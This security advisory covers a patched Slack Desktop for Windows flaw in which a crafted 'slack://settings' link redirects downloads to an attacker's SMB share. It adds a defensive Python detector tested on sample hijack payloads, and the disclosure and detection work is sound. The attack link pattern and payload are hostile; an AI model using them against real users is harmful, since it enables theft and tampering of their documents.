Tenable Researcher David Wells discovered a vulnerability in Slack Desktop for Windows that could have allowed an attacker to alter where files downloaded within Slack are stored. Tenable worked with Slack via HackerOne based on our coordinated disclosure policy and Slack has since released a new version of its Windows desktop client to address this vulnerability. Users should ensure their Slack desktop application is up to date.

Tenable Research discovered a download hijack vulnerability in Slack Desktop version 3.3.7 for Windows. This vulnerability, which has been patched, would have allowed an attacker to post a crafted hyperlink into a Slack channel or private conversation that changes the document download location path when clicked. It does require user interaction to exploit, giving it a CVSSv2 score of 5.5 (Medium).

Slack has 10 million active users every day and 85,000 organizations use the paid version. We cannot confirm how many of those are Windows App users.

Analysis

An attacker can abuse the "slack://" protocol handler, which has the capability to change sensitive settings in the Slack Desktop Application. A crafted link like "slack://settings/?update=" will change the default download location. This download path can be an attacker-owned SMB share, which would cause all future documents downloaded in Slack to be instantly uploaded to the attacker's server. The attacker could also manipulate the contents of the documents after download before the victim opens them. The hyperlink text can be masqueraded by using the "attachment" feature in Slack, which allows an attacker to replace the hyperlink's actual uniform resource identifier with any custom text, possibly fooling users into clicking.

Tenable reported to Slack a vulnerability related to the Slack Desktop Application for Windows via HackerOne. Slack patched the bug as part of its latest update for Slack Desktop Application for Windows, v3.4.0. Slack investigated and found no indication that this vulnerability was ever utilized, nor reports that its users were impacted. As always, users are encouraged to upgrade their apps and clients to the latest available version.

The attack can be performed through any Slack direct messaging or Slack channel to which an attacker might be authenticated. Using this attack vector, an insider could exploit this vulnerability for corporate espionage, manipulation, or to gain access to documents outside of their purview. While less effective, these hyperlink attacks could be done without Slack channel authentication, via external .rss feeds or other content pulled into a Slack channel from an external source that may contain attacker-crafted hyperlinks. This attack could be launched by someone outside of the organization but there are variables that might reduce the chances of success, like knowing which .rss feeds the target Slack subscribes to.

Once the download path has been altered, the attacker can not only steal documents downloaded in the Slack Application, they can also manipulate the documents. For example, if financial documents like invoices are downloaded, the attacker could not only read account numbers but also change them. Additionally, if an Office Document (Word, Excel, etc.) is downloaded, the attacker's server could inject malware into it, so that when opened, the victim machine is compromised.

Solution

Confirm that your Slack for Windows is updated to version 3.4.0. Administrators of Slack deployed via Microsoft Install can read here for more information on how to manually update.
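A defender-side check, added here as an illustration and not part of Tenable's advisory or of Slack's code: it scans message text for "slack://" links aimed at the settings handler, flags an "update" payload that contains a UNC path (the attacker-owned SMB share described above), and notes when the visible label of a link hides the real URI. The sample messages, the "path" key inside the payload and the hostnames are constructed placeholders; the advisory does not give the real setting name, and the `<url|label>` form is Slack's message link markup.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Matches Slack's "<url|label>" link markup (label is what the user sees)
# as well as a bare slack:// link pasted into a message.
LINK_RE = re.compile(r"<(slack://[^|>\s]+)(?:\|([^>]*))?>|(slack://\S+)")
# A UNC path such as \\host\share, tolerant of JSON-style doubled backslashes.
UNC_RE = re.compile(r"\\{2,}[\w.-]+\\+[\w$.-]+")

def find_settings_hijack_links(message: str) -> list:
    """Return one finding per slack://settings link in the message.

    Each finding records the raw URL, the visible label (if any), every UNC
    path found in the 'update' query value, and whether the label masks the
    real URI. Links to other slack:// handlers (channels, teams) are ignored.
    """
    findings = []
    for m in LINK_RE.finditer(message):
        url = m.group(1) or m.group(3)
        label = m.group(2)
        parts = urlsplit(url)
        if parts.netloc.lower() != "settings":
            continue
        payload = "".join(parse_qs(parts.query).get("update", []))
        findings.append({
            "url": url,
            "label": label,
            "unc_paths": UNC_RE.findall(payload),
            "masqueraded": label is not None and "slack://" not in label,
        })
    return findings

# Constructed sample messages (hypothetical key "path", placeholder hosts).
SAMPLE_MESSAGES = [
    r'<slack://settings/?update={"path":"\\files.example\share"}|Q3 invoices>',
    "<slack://channel?team=T0001&id=C0002|general>",
    "Plain text with no links at all.",
]

if __name__ == "__main__":
    for msg in SAMPLE_MESSAGES:
        for finding in find_settings_hijack_links(msg):
            print(finding)
```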